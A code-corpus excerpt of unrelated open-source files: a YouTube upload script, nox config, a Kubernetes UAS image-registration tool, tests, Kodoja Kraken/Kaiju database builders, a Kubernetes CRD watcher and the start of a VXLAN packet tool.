pageToken=page_token
).execute()
all_items += items["items"]
if "nextPageToken" not in items:
break
page_token = items["nextPageToken"]
return all_items
if not out_youtube_video_field in video_table.index or not out_youtube_playlist_field in video_table.index:
index = [None] * len(video_table.index)
for k, v in video_table.index.items():
index[v - 1] = k
if not out_youtube_video_field in video_table.index:
index.append(out_youtube_video_field)
if not out_youtube_playlist_field in video_table.index:
index.append(out_youtube_playlist_field)
video_table.set_index(index)
# Validate the input sheet
to_upload = []
total_bytes = 0
all_files_found = True
for r in range(2, video_table.table.max_row + 1):
video_info = video_table.row(r)
# If there's no video, or it was already uploaded, skip verifying the file
# exists because we don't need it
if not video_info[video_file_field].value or video_info[out_youtube_video_field].value:
continue
video = os.path.join(video_root_path, video_info[video_file_field].value)
if not os.path.isfile(video):
all_files_found = False
print(f"Video '{video}' was not found")
else:
total_bytes += os.path.getsize(video)
to_upload.append(video)
subtitles = video_info[subtitles_file_field].value
if subtitles:
subtitles = os.path.join(video_root_path, video_info[subtitles_file_field].value)
if not os.path.isfile(subtitles):
all_files_found = False
print("Subtitles {} were not found".format(subtitles))
print(f"Will upload {len(to_upload)} videos")
print(f"Total data upload size: {total_bytes * 1e-6}MB")
for v in to_upload:
print(v)
if not all_files_found:
print(f"WARNING: Some files were not found.")
go = input("Proceed with upload? (y/n): ")
if go == "n":
sys.exit(0)
auth = conf_auth.Authentication(youtube=True, use_pickled_credentials=True)
playlists = {}
print("Getting playlists")
yt_playlists = get_all_playlists(auth)
current_playlists = {}
for pl in yt_playlists:
title = pl["snippet"]["title"]
current_playlists[title] = {
"id": pl["id"],
"videos": []
}
items = get_playlist_items(auth, pl["id"])
for i in items:
current_playlists[title]["videos"].append(i["snippet"]["resourceId"]["videoId"])
print("Starting upload")
videos_uploaded = 0
for r in range(2, video_table.table.max_row + 1):
video_info = video_table.row(r)
if not video_info[video_file_field].value:
continue
if videos_uploaded >= 85:
print("Stopping after uploading 85 videos, approaching upload limit")
break
print(f"{video_info[video_file_field].value}")
title = schedule.make_youtube_title(video_info[title_field].value)
description = "Title: " + video_info[title_field].value
authors = None
if video_info[authors_field].value:
authors = video_info[authors_field].value.replace("|", ", ")
else:
authors = video_info["Contributor(s)"].value.replace("|", ", ")
description += "\nAuthors: " + authors
if video_info[description_field].value:
description += "\n" + video_info[description_field].value
# Make sure description text content is valid for Youtube
description = schedule.make_youtube_description(description)
# Upload the video
video_id = None
if not video_info[out_youtube_video_field].value:
video = os.path.join(video_root_path, video_info[video_file_field].value)
if not os.path.isfile(video):
print(f"Skipping uploading missing file {video}")
print("----")
continue
videos_uploaded += 1
try:
upload_response = upload_video(video, title, description, auth)
print(upload_response)
video_info[out_youtube_video_field].value = "https://youtu.be/" + upload_response["id"]
video_id = upload_response["id"]
except Exception as e:
print("Failed to upload {}: {}".format(video, e))
print("Stopping uploading")
break
subtitles = video_info[subtitles_file_field].value
# Upload the subtitles
if subtitles:
try:
subtitles = os.path.join(video_root_path, video_info[subtitles_file_field].value)
subtitles_response = auth.youtube.captions().insert(
part="id,snippet",
body={
"snippet": {
"videoId": upload_response["id"],
"language": "en-us",
"name": video_info[subtitles_file_field].value
}
},
media_body=MediaFileUpload(subtitles)
).execute()
print(subtitles_response)
except Exception as e:
print("Failed to upload {}: {}".format(subtitles, e))
else:
video_id = schedule.match_youtube_id(video_info[out_youtube_video_field].value)
if update_descriptions:
update_response = update_video(video_id, title, description, auth)
print(update_response)
if video_id:
if video_info[playlist_field].value and not video_info[out_youtube_playlist_field].value:
playlist_title = video_info[playlist_prefix_field].value + " - " + str(video_info[playlist_field].value)
if playlist_title[0:4] == "VIS ":
playlist_title = "VIS21" + playlist_title[3:]
playlist_title = schedule.make_youtube_title(playlist_title)
if not playlist_title in playlists:
playlists[playlist_title] = []
if not video_id in playlists[playlist_title]:
playlists[playlist_title].append(video_id)
else:
print("Video already in playlist")
else:
print("Video {} was not uploaded".format(title))
video_db.save(outfile)
print("----")
video_db.save(outfile)
# Create new playlists we need and add videos to the playlists
print(playlists)
for pl, videos in playlists.items():
# Create new playlists if needed
if pl not in current_playlists:
resp = auth.youtube.playlists().insert(
part="id,status,snippet",
body={
"snippet": {
"title": pl
},
"status": {
"privacyStatus": "unlisted"
}
}).execute()
current_playlists[pl] = {
"id": resp["id"],
"videos": []
}
for v in videos:
if v not in current_playlists[pl]["videos"]:
resp = auth.youtube.playlistItems().insert(
part="id,status,snippet",
body={
"snippet": {
"playlistId": current_playlists[pl]["id"],
"resourceId": {
"kind": "youtube#video",
"videoId": v
}
}
}).execute()
r = video_table.find(out_youtube_video_field, "https://youtu.be/" + v)
video_table.entry(r[0], out_youtube_playlist_field).value = "https://www.youtube.com/playlist?list={}".format(current_playlists[pl]["id"])
video_db.save(outfile)
video_db.save(outfile)
``` |
{
"source": "johren-hpe/uai-images",
"score": 2
} |
#### File: uai-images/update-uas/noxfile.py
```python
from __future__ import absolute_import
import os
import nox # pylint: disable=import-error
COVERAGE_FAIL = 98
PYTHON = False if os.getenv("NOX_DOCKER_BUILD") else ['3']
@nox.session(python=PYTHON)
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
run_cmd = ['pylint', 'src']
if 'prod' not in session.posargs:
run_cmd.append('--enable=fixme')
if session.python:
session.install('-r', 'requirements-lint.txt')
session.run(*run_cmd)
@nox.session(python=PYTHON)
def style(session):
"""Run code style checker.
Returns a failure if the style checker fails.
"""
run_cmd = ['pycodestyle',
'--config=.pycodestyle',
'src']
if 'prod' not in session.posargs:
# ignore improper import placement, specifically in
# gen_swagger.py as we have code in there that is needed to
# prepare for importing tms_app. Also, ignore warnings about
# line breaks after binary operators, since there are
# instances where readability is enhanced by line breaks like
# that.
run_cmd.append('--ignore=E402,W504')
if session.python:
session.install('-r', 'requirements-style.txt')
session.run(*run_cmd)
@nox.session(python=PYTHON)
def tests(session):
"""Default unit test session.
"""
# Install all test dependencies, then install this package in-place.
path = 'src'
if session.python:
session.install('-r', 'requirements-test.txt')
session.install('-r', 'requirements.txt')
# Run py.test against the tests.
session.run(
'py.test',
'--quiet',
'-W',
'ignore::DeprecationWarning',
'--cov=src',
'--cov-append',
'--cov-config=.coveragerc',
'--cov-report=',
'--cov-fail-under={}'.format(COVERAGE_FAIL),
os.path.join(path),
)
@nox.session(python=PYTHON)
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs, and then erases coverage data.
"""
if session.python:
session.install('coverage', 'pytest-cov')
session.run('coverage', 'report', '--show-missing',
'--fail-under={}'.format(COVERAGE_FAIL))
session.run('coverage', 'erase')
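# --- Illustrative invocation notes (added comment; commands are examples, not project docs) ---
# Run all sessions defined above:   nox
# Run a single session:             nox -s lint
# Stricter "production" checks:     nox -s lint style -- prod   (args after "--" reach session.posargs)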
```
#### File: update-uas/src/update_uas.py
```python
import sys
from getopt import getopt, GetoptError
from requests.exceptions import RequestException
import requests
IMAGES_URI = "http://cray-uas-mgr:8088/v1/admin/config/images"
VOLUMES_URI = "http://cray-uas-mgr:8088/v1/admin/config/volumes"
CLASSES_URI = "http://cray-uas-mgr:8088/v1/admin/config/classes"
HEADERS = {
'Content-Type': 'application/json',
'Accept': 'application/json'
}
SIMPLE_UAI_CLASS_COMMENT = (
"HPE Provided Simple UAI Class -- Please Do Not Delete or Modify"
)
class UASError(Exception): # pylint: disable=too-few-public-methods
""" Exception to report various errors talking to the UAS
"""
class UsageError(Exception): # pylint: disable=too-few-public-methods
""" Exception to report usage problems in parameter processing
"""
class ContextualError(Exception): # pylint: disable=too-few-public-methods
""" Exception to report failures seen and contextualized in the main
function.
"""
def get_registered_images():
"""Get the current set of registered UAI images from the
UAS.
"""
response = requests.get(IMAGES_URI, headers=HEADERS,
verify=True, timeout=15.0)
if response.status_code != requests.codes['ok']:
raise UASError(
"failed to retrieve configured images from UAS - %s[%d]" %
(response.text, response.status_code)
)
return response.json()
def get_volume_ids(volumenames):
"""Get the list of volume_ids for the specified list of volume names
(if they are configured) in the UAS configuration. If a volume
name is not configured, there is no corresponding volume_id so
ignore it.
"""
response = requests.get(VOLUMES_URI, headers=HEADERS,
verify=True, timeout=15.0)
if response.status_code != requests.codes['ok']:
raise UASError(
"failed to retrieve configured volumes from UAS - %s[%d]" %
(response.text, response.status_code)
)
# On success, the above returns a list of volumes, each with a
# 'volumename' and a 'volume_id'. We want the volume_ids of the
# ones whose names are in the requested volumenames list.
volumes = response.json()
return [
volume['volume_id']
for volume in volumes
if volume['volumename'] in volumenames
]
def get_uai_classes():
"""Get the current set of UAI classes from the UAS.
"""
response = requests.get(CLASSES_URI, headers=HEADERS,
verify=True, timeout=15.0)
if response.status_code != requests.codes['ok']:
raise UASError(
"failed to retrieve configured UAI classes from UAS - %s[%d]" %
(response.text, response.status_code)
)
return response.json()
def find_default_image(images):
"""Search the list of registered images for a defult image, if any. Return
the image if found, otherwise None
"""
for img in images:
if img['default']:
print("The default image is currently: '%s'" % img['imagename'])
return img
return None
def find_image_by_name(images, img_name):
"""Search the list of registered images for one whose image name is
'img_name'. Return the image if found, otherwise None.
"""
for img in images:
if img['imagename'] == img_name:
return img
return None
def register_image(name, default=False):
"""Register an image by name with UAS
"""
okay_codes = [requests.codes['created'], requests.codes['ok']]
params = {
'default': default,
'imagename': name,
}
response = requests.post(IMAGES_URI, params=params, headers=HEADERS,
verify=True, timeout=120.0)
if response.status_code not in okay_codes:
raise UASError(
"failed to register image '%s' default: %s with UAS - %s[%d]" %
(name, str(default), response.text, response.status_code)
)
return 0
def check_default(img, default_img, images):
"""The current image ('img') should be set as default if it is the
proposed default image ('default_img'), and there is no current
default image or the current default image has the same image name
base (ignoring the tag) as the proposed default image.
"""
if default_img is None:
return False
if img != default_img:
return False
cur_default = find_default_image(images)
cur_default_name = cur_default['imagename'] if cur_default else None
cur_default_base = cur_default_name.split(':')[0] if cur_default else None
default_base = default_img.split(':')[0]
return cur_default is None or default_base == cur_default_base
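# Worked example (added comment; image names are hypothetical), assuming img is the
# proposed default_img:
#   current default is 'cray/uai-base:1.0', proposed is 'cray/uai-base:1.1':
#     the base names match, so the newer tag takes over as default -> True
#   current default is 'cray/other:1.0', proposed is 'cray/uai-base:1.1':
#     a default already exists and the bases differ -> False
#   no default registered at all -> True for the proposed default image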
def configure_internal_class(namespace, image_id, volumes, comment):
"""Configure a UAI class that is only internally reachable and HPE
supplied.
"""
okay_codes = [requests.codes['created'], requests.codes['ok']]
params = {
'comment': comment,
'image_id': image_id,
'public_ip': False,
'volume_list': volumes,
'uai_compute_network': True,
'namespace': namespace,
'default': False,
'resource_id': None,
'uai_creation_class': None,
'opt_ports': None,
'priority_class_name': None,
}
response = requests.post(CLASSES_URI, params=params, headers=HEADERS,
verify=True, timeout=120.0)
if response.status_code not in okay_codes:
raise UASError(
"failed to configure class '%s' with UAS - %s[%d]" %
(comment, response.text, response.status_code)
)
return 0
def update_classes(image_name, images, classes):
"""Look for UAI classes that create UAIs with images having the
same base-name as the specified image and update them to use the
specified image.
"""
okay_codes = [requests.codes['created'], requests.codes['ok']]
image = find_image_by_name(images, image_name)
if image is None:
print(
"WARNING: updating classes: image '%s' not found in %s -- "
"should only happen during unit testing, never in production" %
(image_name, str(images))
)
return 0
image_id = image['image_id']
basename = image_name.split(':')[0]
id_list = [image['image_id'] for image in images
if basename == image['imagename'].split(':')[0]]
matching_class_ids = [uai_class['class_id'] for uai_class in classes
if uai_class['uai_image']['image_id'] in id_list]
for class_id in matching_class_ids:
params = {'image_id': image_id}
uri = "%s/%s" % (CLASSES_URI, class_id)
response = requests.patch(uri, params=params, headers=HEADERS,
verify=True, timeout=120.0)
if response.status_code not in okay_codes:
raise UASError(
"failed to update image id in class '%s' to '%s' - %s[%d]" %
(class_id, image_id, response.text, response.status_code)
)
return 0
def usage(err=None):
""" Report correct command usage.
"""
usage_msg = """
update_uas [-d image-name] [-s image-name] -v [volume-list] [image-name [...]]
Where:
-s image-name
Specifies the name of the image to be registered for use in a
simple UAI for sanity testing UAS. The image-name must be in
the list of image-names specified in the arguments.
-d image-name
Specifies a candidate default image name from the list of
supplied image names that will be set if no default is already
designated in UAS when the command is run. The image-name must
be in the list of image-names specified in the arguments.
-v volume-list
Specifies a comma separated list of volume names to be
configured into a simple UAI class provided for sanity testing
UAS. Only volumes that are already configured in UAS will be
added; it is not an error to request a volume name that is
unknown to UAS.
"""[1:]
if err:
sys.stderr.write("%s\n" % err)
sys.stderr.write(usage_msg)
return 1
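# Example invocation (added comment; image and volume names are hypothetical):
#   update_uas -d registry.local/uai:2.1 -s registry.local/uai:2.1 \
#              -v timezone,lustre registry.local/uai:2.1 registry.local/uai-broker:2.1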
def cmdline(argv):
"""Parse arguments and return settings. Raise a usage error if there is
a problem.
"""
default_img_nm = None
simple_img_nm = None
simple_volnames = ["timezone", "lustre"]
try:
opts, args = getopt(argv, "s:d:v:")
except GetoptError as err:
raise UsageError from err
for opt in opts:
if opt[0] == "-d":
default_img_nm = opt[1]
if opt[0] == "-v":
simple_volnames = opt[1].split(',')
if opt[0] == "-s":
simple_img_nm = opt[1]
if default_img_nm and default_img_nm not in args:
raise UsageError(
"the proposed default image '%s' is not one of the images to "
"be registered" % default_img_nm
)
if simple_img_nm and simple_img_nm not in args:
raise UsageError(
"the proposed simple UAI image '%s' is not one of the images to "
"be registered" % simple_img_nm
)
return (default_img_nm, simple_img_nm, simple_volnames, args)
def main(argv):
""" main entrypoint
"""
retval = 0
default_img_nm, simple_img_nm, simple_volnames, args = cmdline(argv)
try:
images = get_registered_images()
except (RequestException, UASError) as err:
raise ContextualError from err
try:
simple_volumes = get_volume_ids(simple_volnames)
except (RequestException, UASError) as err:
raise ContextualError from err
try:
uai_classes = get_uai_classes()
except (RequestException, UASError) as err:
raise ContextualError from err
for img in args:
if find_image_by_name(images, img):
print("Image named '%s' is already registered, nothing done" % img)
continue
default = check_default(img, default_img_nm, images)
try:
register_image(img, default)
except (RequestException, UASError) as err:
print("Registering UAS image '%s' failed - %s" % (img, str(err)))
retval = 1
continue
print("Registered UAI image '%s', default=%s" % (img, str(default)))
# We (may) have registered new images, so get the up-to-date list
# from the UAS to use from here on in.
images = get_registered_images()
# If an image name was given for a simple UAI class, make the
# simple UAI class.
if simple_img_nm:
simple_image = find_image_by_name(images, simple_img_nm)
if not simple_image:
            raise ContextualError(
                "Cannot find simple image '%s' in UAS config" % simple_img_nm
            )
try:
configure_internal_class(
namespace="user",
image_id=simple_image['image_id'],
volumes=simple_volumes,
comment=SIMPLE_UAI_CLASS_COMMENT
)
except (RequestException, UASError) as err:
raise ContextualError from err
# Go through the newly registered images and update any classes
# that are using images with the same base name as the new ones to
# use the new ones.
for img in args:
try:
update_classes(img, images, uai_classes)
except (RequestException, UASError) as err:
print(
"Failed to update classes using images similar to '%s' - %s" %
(img, str(err))
)
retval = 1
if retval != 0:
        raise ContextualError(
            "Errors detected during update; see details above"
        )
return 0
def entrypoint(argv):
""" Entrypoint function to handle exceptions from main and turn them into
return codes and error reports that will, eventually, become exit status.
"""
try:
return main(argv)
except UsageError as err:
usage(str(err))
return 1
except ContextualError as err:
print(str(err))
return 1
# start here
if __name__ == "__main__": # pragma no unit test
sys.exit(entrypoint(sys.argv[1:])) # pragma no unit test
``` |
{
"source": "johri002/Race-the-car",
"score": 3
} |
#### File: johri002/Race-the-car/test_Race_the_car.py
```python
import pytest
import Race_the_car
BOARDWIDTH = Race_the_car.BOARDWIDTH
BOARDHEIGHT = Race_the_car.BOARDHEIGHT
OPEN_SPACE = Race_the_car.OPEN_SPACE
PLAYER_ONE = Race_the_car.PLAYER_ONE
PLAYER_TWO = Race_the_car.PLAYER_TWO
BOARDWIDTH_CENTER = Race_the_car.BOARDWIDTH_CENTER
ONE_STARTING_ROW = Race_the_car.ONE_STARTING_ROW
TWO_STARTING_ROW = Race_the_car.TWO_STARTING_ROW
def test_getStartingBoard():
board = Race_the_car.getStartingBoard(OPEN_SPACE)
# player 1 position correct
assert board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] == PLAYER_ONE
board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] = OPEN_SPACE
# player 2 position correct
assert board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] == PLAYER_TWO
board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] = OPEN_SPACE
# Everything else empty spaces
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
assert board[x][y] == OPEN_SPACE
# proper behavior if input is changed
board = Race_the_car.getStartingBoard(0)
assert board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] == PLAYER_ONE
board[BOARDWIDTH_CENTER][ONE_STARTING_ROW] = 0
assert board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] == PLAYER_TWO
board[BOARDWIDTH_CENTER][TWO_STARTING_ROW] = 0
for x in range(BOARDWIDTH):
for y in range(BOARDHEIGHT):
assert board[x][y] == 0
return
``` |
{
"source": "johrollin/kodoja",
"score": 3
} |
#### File: kodoja/diagnosticTool_scripts/database_modules.py
```python
import subprocess
import pandas as pd
import os
import re
import sys
import time
try:
# Python 3
from urllib.request import urlretrieve, urlcleanup
from urllib.error import URLError
except ImportError:
# Python 2
from urllib import urlretrieve, urlcleanup
URLError = IOError
def download_with_retries(url, destination, retries=5):
"""Download file using urlretrieve, with automatic retries.
If the n-th attempt fails, will wait for n-seconds before
trying again.
    If the final attempt fails, writes a message to stderr and
    re-raises the error.
"""
for attempt in range(1, retries + 1):
urlcleanup() # Seems important with FTP on Python 2.7
try:
return urlretrieve(url, destination)
except URLError as err:
if attempt < retries:
time.sleep(attempt)
sys.stderr.write("Will retry downloading %r attempt %i\n"
% (url, attempt + 1))
else:
sys.stderr.write("ERROR: Failed to download %r\n" % url)
raise err
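# Illustrative call (hypothetical URL and destination path; shown as a comment
# so nothing is fetched at import time):
# download_with_retries(
#     "ftp://ftp.ncbi.nlm.nih.gov/genomes/refseq/viral/assembly_summary.txt",
#     "/tmp/viral_assembly_summary.txt", retries=3)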
# Download refseq files from ncbi ftp site - use ncbi-genome-download
def ncbi_download(tool, genome_download_dir, parallel, host_taxid):
"""Download genomic or protein data from NCBI ftp site using ncbi-genome-download."""
assert (tool == "kraken") | (tool == "kaiju"),\
"Argument 'tool' must be either 'kraken' or 'kaiju'."
if tool == "kraken":
file_format = "fasta"
else:
file_format = "protein-fasta"
# Check directory exists
if not os.path.exists(genome_download_dir):
os.makedirs(genome_download_dir)
ngd_command = "ncbi-genome-download -F " + file_format + " -o " + genome_download_dir
if host_taxid:
# Single host ID, so no need to set the parallel option
taxid_ngd_command = ngd_command + " --species-taxid " + str(host_taxid) + " plant"
subprocess.check_call(taxid_ngd_command, shell=True)
ngd_command += " --parallel " + str(parallel) + " viral"
subprocess.check_call(ngd_command, shell=True)
def ncbi_rename_customDB(tool, genome_download_dir, host_taxid, extra_files=False, extra_taxid=False):
"""Rename ncbi data files for custom databases.
    To add NCBI files to a database, Kraken and Kaiju require the files to have formatted
identifiers. This script modifies identifiers of files ending in .fna to kraken
format, and files ending in .faa to kaiju format. Once renamed, original files are
deleted.
"""
assert (tool == "kraken") | (tool == "kaiju"), "Argument 'tool' must be either 'kraken' or 'kaiju'."
if tool == "kraken":
file_extension = ".fna.gz"
else:
file_extension = ".faa.gz"
path_assembly_summary = os.path.join(genome_download_dir, "viral_assembly_summary.txt")
assembly_summary = pd.read_table(path_assembly_summary, sep='\t',
skiprows=1, header=0)
assembly_summary.rename(columns={'# assembly_accession': 'assembly_accession'},
inplace=True) # rename column to exclude "#"
# If extra files, create dictionary containing file names and taxIDs
if extra_files:
new_extra = []
for extraFiles in extra_files:
new_extra.append(extraFiles.split('/')[-1])
extra_dict = dict(zip(new_extra, extra_taxid))
kaiju_count = 1 # Count for protein sequences
for root, subdirs, files in os.walk(genome_download_dir):
for filename in files:
if filename.endswith(file_extension) and not filename.endswith(tool + file_extension):
zip_filename = os.path.join(root, filename)
subprocess.check_call("gunzip " + zip_filename, shell=True) # Uncompress ".gz" file
unzip_filename = zip_filename[:-3]
if root.endswith("extra"):
taxid = extra_dict[filename]
assert 'taxid' in locals() or 'taxid' in globals(),\
"Error: no taxid assigned for extra files provided"
elif root.split('/')[-2] == 'plant':
taxid = host_taxid
else:
# Retrieve assembly accession number for file path
assembly_accession = re.findall(r'/viral/([^(]*)/', unzip_filename)
                    assert 'assembly_accession' in locals() or 'assembly_accession' in globals(),\
                        "Can't locate assembly accession"
# retrieve taxid for file
taxid_list = list(assembly_summary.loc[assembly_summary['assembly_accession'] == assembly_accession[0]]["taxid"])
                    assert (len(taxid_list) == 1),\
                        "Taxid has " + str(len(taxid_list)) + " values. Should only have 1 value"
taxid = taxid_list[0]
# Create new genomic file with rename sequence identifier to comply with tool
# requirements for custom database
renamed_file = unzip_filename[:-4] + "." + tool + unzip_filename[-4:]
with open(renamed_file, 'w') as out_file, open(unzip_filename, 'r') as in_file:
for line in in_file:
if line[0] == ">":
if tool == "kraken":
if " " in line:
insert = line.index(" ")
else:
insert = len(line) - 1
out_file.write(line[:insert] + "|kraken:taxid|" + str(taxid) + line[insert:])
else:
out_file.write(">" + str(kaiju_count) + "_" + str(taxid) + "\n")
kaiju_count += 1
else:
out_file.write(line)
# Delete original file
os.remove(unzip_filename)
# Compress modified file
subprocess.check_call("gzip " + renamed_file, shell=True)
def krakenDB_build(genome_download_dir, kraken_db_dir, threads, kraken_kmer, kraken_minimizer,
subset_vir_assembly, taxonomy, jellyfish_hash_size=False, kraken_max_dbSize=False):
"""Build kraken database with the renamed .fna files from ncbi."""
# Make a kraken database directory
if not os.path.exists(kraken_db_dir):
os.makedirs(kraken_db_dir)
# Download or create symlink of taxonomy for Kraken database
if taxonomy:
os.symlink(taxonomy, os.path.join(kraken_db_dir, "taxonomy"))
else:
subprocess.check_call("kraken-build --download-taxonomy --threads " +
str(threads) + " --db " + kraken_db_dir, shell=True)
file_list = []
# Add files downloaded and ready for kraken ("<file>.kraken.fna") to kraken library
for root, subdirs, files in os.walk(genome_download_dir):
for filename in files:
if subset_vir_assembly:
if root.split('/')[-1] in subset_vir_assembly and filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
elif root.split('/')[-2] == 'plant' and filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
elif root.endswith('extra') and filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
else:
if filename.endswith("kraken.fna.gz"):
file_list.append(os.path.join(root, filename))
for genome_file in file_list:
zip_filename = genome_file
subprocess.check_call("gunzip " + zip_filename, shell=True)
unzip_filename = zip_filename[:-3]
subprocess.check_call("kraken-build --add-to-library " + unzip_filename +
" --db " + kraken_db_dir, shell=True)
subprocess.check_call("gzip " + unzip_filename, shell=True)
kraken_command = "kraken-build --build --threads " + str(threads) + " --db " + \
kraken_db_dir + " --kmer-len " + str(kraken_kmer) + \
" --minimizer-len " + str(kraken_minimizer)
if kraken_max_dbSize:
kraken_command += " --max-db-size " + str(kraken_max_dbSize)
if jellyfish_hash_size:
kraken_command += " --jellyfish-hash-size " + jellyfish_hash_size
subprocess.check_call(kraken_command, shell=True)
# Clear unnecessary files from kraken database directory
# subprocess.check_call("kraken-build --clean --db " + kraken_db_dir, shell=True)
def kaijuDB_build(genome_download_dir, kaiju_db_dir, subset_vir_assembly):
    """Build kaiju database with the renamed .faa files from ncbi."""
# Make a kaiju database directory
if not os.path.exists(kaiju_db_dir):
os.makedirs(kaiju_db_dir)
# Add files downloaded and ready for kaiju ("<file>.kaiju.faa") to one fasta file
kaijuDB_fasta = os.path.join(kaiju_db_dir, "kaiju_library.faa")
count = 0
file_list = []
for root, subdirs, files in os.walk(genome_download_dir):
for filename in files:
if subset_vir_assembly:
if root.split('/')[-1] in subset_vir_assembly and filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
elif root.split('/')[-2] == 'plant' and filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
elif root.endswith('extra') and filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
else:
if filename.endswith("kaiju.faa.gz"):
file_list.append(os.path.join(root, filename))
with open(kaijuDB_fasta, "w") as out_file:
for protein_file in file_list:
zip_filename = protein_file
subprocess.check_call("gunzip " + zip_filename, shell=True)
unzip_filename = zip_filename[:-3]
with open(unzip_filename, 'r') as in_file:
for line in in_file:
if line[0] == ">":
out_file.write(line[:1] + str(count) + "_" + line[1:])
count += 1
else:
out_file.write(line)
subprocess.check_call("gzip " + unzip_filename, shell=True)
try:
# Assume kaiju v1.7.0 onwards:
subprocess.check_output(["kaiju-mkbwt", "-help"])
prefix = "kaiju-"
except OSError: # Expect FileNotFoundError on Python 3.3+
# kaiju prior to v1.7.0
prefix = ""
# Build Kaiju database
subprocess.check_call(prefix + "mkbwt -n 5 -a ACDEFGHIKLMNPQRSTVWY -o " +
os.path.join(kaiju_db_dir, "kaiju_library") + " " +
os.path.join(kaiju_db_dir, "kaiju_library.faa"),
shell=True)
subprocess.check_call(prefix + "mkfmi " + os.path.join(kaiju_db_dir, "kaiju_library"),
shell=True)
os.remove(os.path.join(kaiju_db_dir, "kaiju_library.faa"))
os.remove(os.path.join(kaiju_db_dir, "kaiju_library.bwt"))
os.remove(os.path.join(kaiju_db_dir, "kaiju_library.sa"))
``` |
{
"source": "johruss/airtable-python-wrapper",
"score": 3
} |
#### File: airtable-python-wrapper/tests/test_request_errors.py
```python
import json
import pytest
from mock import Mock
from requests import HTTPError
def http_error_with_url():
raise HTTPError("unable to process page%20url")
def json_decoder_error():
raise ValueError()
def test_error_mesg_in_json(table, response):
response.status_code = 400
response.json = Mock(return_value={"error": "here's what went wrong"})
with pytest.raises(HTTPError):
table._process_response(response)
def test_error_without_mesg_in_json(table, response):
response.status_code = 404
response.json = Mock(return_value={})
with pytest.raises(HTTPError):
table._process_response(response)
def test_non_422_error_with_json_decode_error(table, response):
response.status_code = 400
response.json.side_effect = json.decoder.JSONDecodeError('', '', 0)
with pytest.raises(HTTPError):
table._process_response(response)
``` |
{
"source": "johscheuer/k8s-python-crd",
"score": 2
} |
#### File: johscheuer/k8s-python-crd/main.py
```python
from kubernetes import client, config, watch
GROUP = 'stable.example.com'
RESOURCE_NAME = 'crontabs'
# https://github.com/kubernetes-client/python/issues/415
def create_crd(api_instance, crd):
try:
result = api_instance.create_custom_resource_definition(body=crd)
print(result['code'])
if result['code'] != 200:
print(result['status'])
except ValueError:
pass
# Configs can be set in Configuration class directly or using helper utility
config.load_kube_config()
crd_metadata = client.V1ObjectMeta(name='%s.%s' % (RESOURCE_NAME, GROUP))
crd_validation = client.V1beta1CustomResourceValidation(
open_apiv3_schema=client.V1beta1JSONSchemaProps(
properties={
'cronSpec': client.V1beta1JSONSchemaProps(
type='string',
            pattern=r'^(\d+|\*)(/\d+)?(\s+(\d+|\*)(/\d+)?){4}$',
),
'replicas': client.V1beta1JSONSchemaProps(
type='integer',
minimum=1,
maximum=10,
)
}
)
)
crd_spec = client.V1beta1CustomResourceDefinitionSpec(
group=GROUP,
version='v1',
scope='Namespaced',
names=client.V1beta1CustomResourceDefinitionNames(
plural=RESOURCE_NAME,
singular='crontab',
kind='CronTab',
short_names=['ct']
),
validation=crd_validation,
)
crd = client.V1beta1CustomResourceDefinition(
api_version='apiextensions.k8s.io/v1beta1',
kind='CustomResourceDefinition',
metadata=crd_metadata,
spec=crd_spec,
status=None)
api_instance = client.ApiextensionsV1beta1Api()
result_list = api_instance.list_custom_resource_definition()
for item in result_list.items:
if item.metadata.name == crd.metadata.name:
print('CRD is already present')
print(item.metadata.name)
else:
create_crd(api_instance, crd)
if len(result_list.items) == 0:
create_crd(api_instance, crd)
# Watch all crds
crds = client.CustomObjectsApi()
resource_version = ''
for event in watch.Watch().stream(
crds.list_cluster_custom_object,
GROUP,
'v1',
RESOURCE_NAME,
resource_version=resource_version):
obj = event["object"]
operation = event['type']
spec = obj.get("spec")
if not spec:
continue
metadata = obj.get("metadata")
resource_version = metadata['resourceVersion']
name = metadata['name']
print("Handling %s on %s" % (operation, name))
``` |
{
"source": "johscheuer/OPNFV-Lab",
"score": 2
} |
#### File: OPNFV-Lab/service-function/vxlan_tool.py
```python
import socket
import sys
import argparse
import struct
from ctypes import Structure, c_ubyte, c_ushort, c_uint
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright(c) 2015, Intel, Inc. and Cisco Systems, Inc."
__version__ = "0.2"
__email__ = "<EMAIL>, <EMAIL>"
__status__ = "beta"
NSH_TYPE1_LEN = 0x6
NSH_MD_TYPE1 = 0x1
NSH_VERSION1 = int('00', 2)
NSH_NEXT_PROTO_IPV4 = int('00000001', 2)
NSH_NEXT_PROTO_OAM = int('00000100', 2)
NSH_NEXT_PROTO_ETH = int('00000011', 2)
NSH_FLAG_ZERO = int('00000000', 2)
IP_HEADER_LEN = 5
IPV4_HEADER_LEN_BYTES = 20
IPV4_VERSION = 4
IPV4_PACKET_ID = 54321
IPV4_TTL = 255
IPV4_TOS = 0
IPV4_IHL_VER = (IPV4_VERSION << 4) + IP_HEADER_LEN
UDP_HEADER_LEN_BYTES = 8
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class VXLAN(Structure):
_fields_ = [('flags', c_ubyte),
('reserved', c_uint, 16),
('next_protocol', c_uint, 8),
('vni', c_uint, 24),
('reserved2', c_uint, 8)]
def __init__(self, flags=int('00001000', 2), reserved=0, next_protocol=0,
vni=int('111111111111111111111111', 2),
reserved2=0, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.flags = flags
